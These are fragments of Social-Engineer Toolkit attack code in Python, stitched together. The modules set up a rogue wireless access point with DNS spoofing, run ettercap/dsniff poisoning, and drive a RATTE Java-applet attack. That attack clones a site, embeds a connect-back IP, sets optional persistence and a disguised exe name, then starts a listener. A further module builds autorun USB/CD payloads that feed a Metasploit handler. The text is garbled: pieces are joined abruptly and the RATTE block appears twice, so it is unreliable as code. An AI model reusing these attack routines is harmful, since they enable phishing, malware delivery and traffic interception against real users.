except: pass if not os.path.isfile("/etc/init.d/isc-dhcp-server"): core.print_warning("isc-dhcp-server does not appear to be installed.") core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.") if not os.path.isfile(dnsspoof_path): if os.path.isfile("/usr/sbin/dnsspoof"): dnsspoof_path = "/usr/sbin/dnsspoof" else: core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....") core.exit_set() if not os.path.isfile(airbase_path): airbase_path = "src/wireless/airbase-ng" core.print_info("using SET's local airbase-ng binary") core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.") core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""") print("") core.print_status("SET will now launch nano to edit the file.") core.print_status("Press ^X to exit nano and don't forget to save the updated file!") core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!") core.return_continue() subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait() # DHCP SERVER CONFIG HERE dhcp_config1 = (""" ddns-update-style none; authoritative; log-facility local7;
core.print_warning("isc-dhcp-server does not appear to be installed.") core.print_warning( "apt-get install isc-dhcp-server to install it. Things may fail now.") if not os.path.isfile(dnsspoof_path): if os.path.isfile("/usr/sbin/dnsspoof"): dnsspoof_path = "/usr/sbin/dnsspoof" else: core.print_warning( "DNSSpoof was not found. Please install or correct path in set_config. Exiting...." ) core.exit_set() if not os.path.isfile(airbase_path): airbase_path = "src/wireless/airbase-ng" core.print_info("using SET's local airbase-ng binary") core.print_info( "For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface." ) core.print_info( """This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""" ) print("") core.print_status("SET will now launch nano to edit the file.") core.print_status( "Press ^X to exit nano and don't forget to save the updated file!") core.print_warning( "If you receive an empty file in nano, please check the path of your isc-dhcp-server file!" ) core.return_continue()
def prep_website():
    """Report that this feature is disabled, then call ``return_continue()``."""
    notice = "This feature is currently under development and disabled."
    print_info(notice)
    return_continue()
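def main():
    """Interactive driver for the RATTE Java-applet module.

    Prompts the operator for the site to clone, the connect-back IP address,
    the applet port, the RATTE server port, the persistence choice and an
    optional custom executable name. It then calls ``prepare_ratte``, runs
    ``java_applet_attack_tw``, copies ``ratteM.exe`` from
    ``src/program_junk`` into ``reports/`` under the name read from
    ``rand_gen``, calls ``ratte_listener_start`` and finally
    ``stop_web_server_tw``.

    Returns None. Returns early (after ``sleep(4)``) when the site or the
    IP address is still rejected on the third attempt.
    """
    give_up_msg = "\nMaybe you have the address written down wrong?"

    # --- site to clone: needs an http/https scheme and a non-empty netloc ---
    valid_site = False
    site_attempts = 0
    while not valid_site and site_attempts < 3:
        website = raw_input(
            core.setprompt(["9", "2"],
                           "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)
        if site.scheme in ("http", "https"):
            if site.netloc != "":
                valid_site = True
                continue
            failure = give_up_msg + core.bcolors.ENDC
            retry = "I can't determine the fqdn or IP of the site. Try again?"
        else:
            failure = give_up_msg
            retry = ("I couldn't determine whether this is an http or "
                     "https site. Try again?")
        if site_attempts == 2:
            core.print_error(failure)
            sleep(4)
            return
        core.print_warning(retry)
        site_attempts += 1

    # --- connect-back address, checked by core.validate_ip ---
    valid_ip = False
    ip_attempts = 0
    # "!= True" is kept on purpose: only a result equal to True ends the loop.
    while valid_ip != True and ip_attempts < 3:
        ipaddr = raw_input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if ip_attempts == 2:
                core.print_error(give_up_msg)
                sleep(4)
                return
            ip_attempts += 1

    # Original author's note: javaport must be 80, because the applet's web
    # injection uses port 80 to download the payload.
    java_prompt = "Port Java applet should listen on [80]"
    try:
        javaport = int(raw_input(core.setprompt(["9", "2"], java_prompt)))
        # Reject everything outside 1..65535. The original test only caught
        # 0 and values above 65535, so negative numbers slipped through.
        while javaport < 1 or javaport > 65535:
            if javaport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            else:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(raw_input(core.setprompt(["9", "2"], java_prompt)))
    except ValueError:
        # Empty or non-numeric input selects the default.
        javaport = 80

    ratte_prompt = "Port RATTE Server should listen on [8080]"
    try:
        ratteport = int(raw_input(core.setprompt(["9", "2"], ratte_prompt)))
        while ratteport == javaport or ratteport < 1 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Port must not be equal to javaport!")
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                raw_input(core.setprompt(["9", "2"], ratte_prompt)))
    except ValueError:
        # NOTE(review): this default skips the collision check above, so it
        # can equal javaport when the operator chose 8080 for the applet.
        ratteport = 8080

    persistent = core.yesno_prompt(
        ["9", "2"], "Should RATTE be persistentententent [no|yes]?")

    customexe = raw_input(
        core.setprompt(
            ["9", "2"],
            "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    # Patch the collected settings into the binary.
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # The last line of rand_gen is the file name used under reports/.
    # NOTE(review): if rand_gen is empty, ratte_random is never bound and the
    # copy below raises NameError, as in the original.
    with open("%s/src/program_junk/rand_gen" % (definepath), "r") as rand_file:
        for line in rand_file:
            ratte_random = line.rstrip()

    # Argument list instead of a shell string: the working directory and the
    # name read from rand_gen are no longer interpreted by a shell.
    subprocess.Popen([
        "cp",
        "%s/src/program_junk/ratteM.exe" % (definepath),
        "%s/reports/%s" % (definepath, ratte_random),
    ]).wait()

    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    # The listener call has returned; shut the web server down again.
    stop_web_server_tw()
    return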
definepath=os.getcwd() # grab config file config=file("config/set_config", "r").readlines() # grab our default directory cwd=os.getcwd() # set a variable as default to n or no ettercapchoice= 'n' # add dsniffchoice dsniffchoice = 'n' for line in config: # check for ettercap choice here match1=re.search("ETTERCAP=ON",line) if match1: setcore.print_info("ARP Cache Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC) ettercapchoice='y' # check for dsniff choice here match2=re.search("DSNIFF=ON", line) if match2: setcore.print_info("DSNIFF DNS Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC) dsniffchoice = 'y' ettercapchoice = 'n' # GRAB CONFIG from SET fileopen=file("config/set_config", "r").readlines() for line in fileopen: # grab the ettercap interface match=re.search("ETTERCAP_INTERFACE=", line) if match:
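def main():
    """Interactive driver for the RATTE Java-applet module.

    Prompts the operator for the site to clone, the connect-back IP address,
    the applet port, the RATTE server port, the persistence choice and an
    optional custom executable name. It then calls ``prepare_ratte``, runs
    ``java_applet_attack_tw``, copies ``ratteM.exe`` from
    ``src/program_junk`` into ``reports/`` under the name read from
    ``rand_gen``, calls ``ratte_listener_start`` and finally
    ``stop_web_server_tw``.

    Returns None. Returns early (after ``sleep(4)``) when the site or the
    IP address is still rejected on the third attempt.
    """
    give_up_msg = "\nMaybe you have the address written down wrong?"

    # --- site to clone: needs an http/https scheme and a non-empty netloc ---
    valid_site = False
    site_attempts = 0
    while not valid_site and site_attempts < 3:
        website = raw_input(
            core.setprompt(["9", "2"],
                           "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)
        if site.scheme in ("http", "https"):
            if site.netloc != "":
                valid_site = True
                continue
            failure = give_up_msg + core.bcolors.ENDC
            retry = "I can't determine the fqdn or IP of the site. Try again?"
        else:
            failure = give_up_msg
            retry = ("I couldn't determine whether this is an http or "
                     "https site. Try again?")
        if site_attempts == 2:
            core.print_error(failure)
            sleep(4)
            return
        core.print_warning(retry)
        site_attempts += 1

    # --- connect-back address, checked by core.validate_ip ---
    valid_ip = False
    ip_attempts = 0
    # "!= True" is kept on purpose: only a result equal to True ends the loop.
    while valid_ip != True and ip_attempts < 3:
        ipaddr = raw_input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if ip_attempts == 2:
                core.print_error(give_up_msg)
                sleep(4)
                return
            ip_attempts += 1

    # Original author's note: javaport must be 80, because the applet's web
    # injection uses port 80 to download the payload.
    java_prompt = "Port Java applet should listen on [80]"
    try:
        javaport = int(raw_input(core.setprompt(["9", "2"], java_prompt)))
        # Reject everything outside 1..65535. The original test only caught
        # 0 and values above 65535, so negative numbers slipped through.
        while javaport < 1 or javaport > 65535:
            if javaport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            else:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(raw_input(core.setprompt(["9", "2"], java_prompt)))
    except ValueError:
        # Empty or non-numeric input selects the default.
        javaport = 80

    ratte_prompt = "Port RATTE Server should listen on [8080]"
    try:
        ratteport = int(raw_input(core.setprompt(["9", "2"], ratte_prompt)))
        while ratteport == javaport or ratteport < 1 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Port must not be equal to javaport!")
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                raw_input(core.setprompt(["9", "2"], ratte_prompt)))
    except ValueError:
        # NOTE(review): this default skips the collision check above, so it
        # can equal javaport when the operator chose 8080 for the applet.
        ratteport = 8080

    persistent = core.yesno_prompt(
        ["9", "2"], "Should RATTE be persistentententent [no|yes]?")

    customexe = raw_input(
        core.setprompt(
            ["9", "2"],
            "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    # Patch the collected settings into the binary.
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # The last line of rand_gen is the file name used under reports/.
    # NOTE(review): if rand_gen is empty, ratte_random is never bound and the
    # copy below raises NameError, as in the original.
    with open("%s/src/program_junk/rand_gen" % (definepath), "r") as rand_file:
        for line in rand_file:
            ratte_random = line.rstrip()

    # Argument list instead of a shell string: the working directory and the
    # name read from rand_gen are no longer interpreted by a shell.
    subprocess.Popen([
        "cp",
        "%s/src/program_junk/ratteM.exe" % (definepath),
        "%s/reports/%s" % (definepath, ratte_random),
    ]).wait()

    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    # The listener call has returned; shut the web server down again.
    stop_web_server_tw()
    return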
# if using pdf payload elif trigger == 2: payload = "template.pdf" elif trigger == 3: payload = "openthis.wab" else: payload = "" filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload)) core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'") core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.") core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun") # if we want to launch payload and automatically create listener if trigger in [1, 2, 3]: choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]") if choice1.lower() == "yes" or choice1.lower() == "y": # if we used something to create other than solo.py then write out the # listener if not os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \ open(os.path.join(core.setdir, "payload.options")) as fileopen: for line in fileopen: line = line.split(" ") filewrite.write("use multi/handler\n") filewrite.write("set payload {0}\n".format(line[0])) filewrite.write("set lhost {0}\n".format(line[1]))